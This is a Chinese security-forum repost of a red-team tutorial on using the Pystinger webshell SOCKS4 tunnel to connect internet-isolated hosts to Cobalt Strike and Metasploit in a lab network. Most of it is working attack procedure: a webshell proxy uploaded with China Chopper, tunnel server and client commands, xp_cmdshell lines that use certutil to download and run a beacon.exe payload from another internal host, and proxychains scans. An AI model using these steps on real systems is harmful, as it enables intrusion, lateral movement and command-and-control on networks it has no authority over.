安全矩阵

 找回密码
 立即注册
搜索
查看: 4002|回复: 0

利用Pystinger Socks4上线不出网主机

[复制链接]

221

主题

233

帖子

792

积分

高级会员

Rank: 4

积分
792
发表于 2021-8-29 16:11:45 | 显示全部楼层 |阅读模式
利用Pystinger Socks4上线不出网主机 (qq.com)
利用Pystinger Socks4上线不出网主机原创 3had0w 潇湘信安 3天前
收录于话题
#内网安全34
#安全工具47
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

我们接着前两篇文章继续分享一篇利用Pystinger Socks4代理方式上线不出网主机的姿势,包括单主机和内网多台主机的两种常见场景!!!

项目地址:https://github.com/FunnyWolf/pystinger

相关阅读:
1、利用MSF上线断网主机的思路分享
2、利用goproxy http上线不出网主机

0x01 测试环境
  1. 攻击机(Kali):192.168.56.101
  2. 受害机1(Web):192.168.56.102、192.168.186.3 - 双网卡
  3. 受害机2(Data):192.168.186.4 - 断网机
复制代码

0x02 Pystinger简单介绍
Pystinger由服务端webshell、stinger_server和客户端stinger_client两部分组成,可通过webshell实现内网SOCK4代理及端口映射,支持php/jsp(x)/aspx三种代理脚本。


webshell只负责流量转发,大部分建立连接及处理数据的工作由stinger_server完成,stinger_client则用于接收转发过来的流量数据以及与CS/MSF的listener建立TCP连接等。

大致原理如下图,更为详细的原理分析可阅读“奇安信安全服务”公众号中的“红队攻防实践:不出网主机搭建内网隧道新思路”一文进行学习了解。


0x03 Pystinger上线不出网主机
我们先将Pystinger项目的服务端stinger_server.exe、proxy.aspx通过中国菜刀上传至目标磁盘可读写目录中,访问proxy.aspx返回UTF-8表示正常,接着执行以下命令启动服务端。

           

start C:\inetpub\wwwroot\stinger_server.exe 0.0.0.0


注:作者提示不要直接运行D:/XXX/stinger_server.exe,因为这样可能会导致TCP断连。

将客户端stinger_client上传至Kali攻击机的tmp临时目录,然后再执行以下命令将Socks4的代理流量转发到我们Kali攻击机60000端口上,只要把-w参数替换为自己上传的代理脚本地址即可。

  1. root@kali:/tmp# chmod 777 stinger_client
  2. root@kali:/tmp# ./stinger_client -w http://192.168.56.102/proxy.aspx -l 127.0.0.1 -p 60000
复制代码




场景1:单主机上线
已控主机为单主机,不出外网且仅允许访问目标Web的80端口。如遇这种场景时可在执行完以上操作后在CobaltStrike创建一个Listener,HTTP Hosts填127.0.0.1,HTTP Port填60020。


场景2:多主机上线
已控主机为内网其中一台主机,双网卡(192.168.56.X为出网段,192.168.186.X为不出网段),在对不出网段中的其他内网主机进行横向移动上线时可在执行完以上操作后在CobaltStrike创建一个Listener,HTTP Hosts填192.168.186.3,HTTP Port填60020。


配置好监听后生成一个可执行马儿,将该文件放至192.168.186.3的Web服务器中供192.168.186.4断网数据库服务器下载,再利用xp_cmdshell组件执行beacon.exe后即可成功上线,Pystinger客户端那边也收到了相关连接数据。
  1. EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://192.168.186.3/beacon.exe C:\ProgramData\beacon.exe'
  2. EXEC master..xp_cmdshell 'C:\ProgramData\beacon.exe'
复制代码





CobaltStrike监听设置

           
  •         单主机上线:CobaltStrike->Listeners->Add->127.0.0.1:60020;

           
  •         多主机上线:CobaltStrike->Listeners->Add->192.168.186.3:60020;


           
  •         注:目标主机为双网卡时必须用不出网IP段的内网IP地址进行监听才能上线不出网主机;


上线至MSF的利用姿势
Kali攻击机上编辑/etc/proxychains.conf文件,底部添加一条socks4代理:127.0.0.1:60000,添加完成后先执行以下几条命令来验证下是否已经与不出网IP段通了?
  1. root@kali:~# proxychains telnet 192.168.186.4 1433
  2. root@kali:~# proxychains curl http://192.168.186.4
  3. root@kali:~# proxychains nmap -sT -Pn 192.168.186.4
  4. [...SNIP...]
复制代码
如果通了就再用proxychains来启动msfconsole,用不出网IP段的内网IP地址进行监听即可。原理大家都懂,就不实操截图了...。
  1. root@kali:~# proxychains msfconsole -q
  2. [...SNIP...]
复制代码


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 16:31 , Processed in 0.013775 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表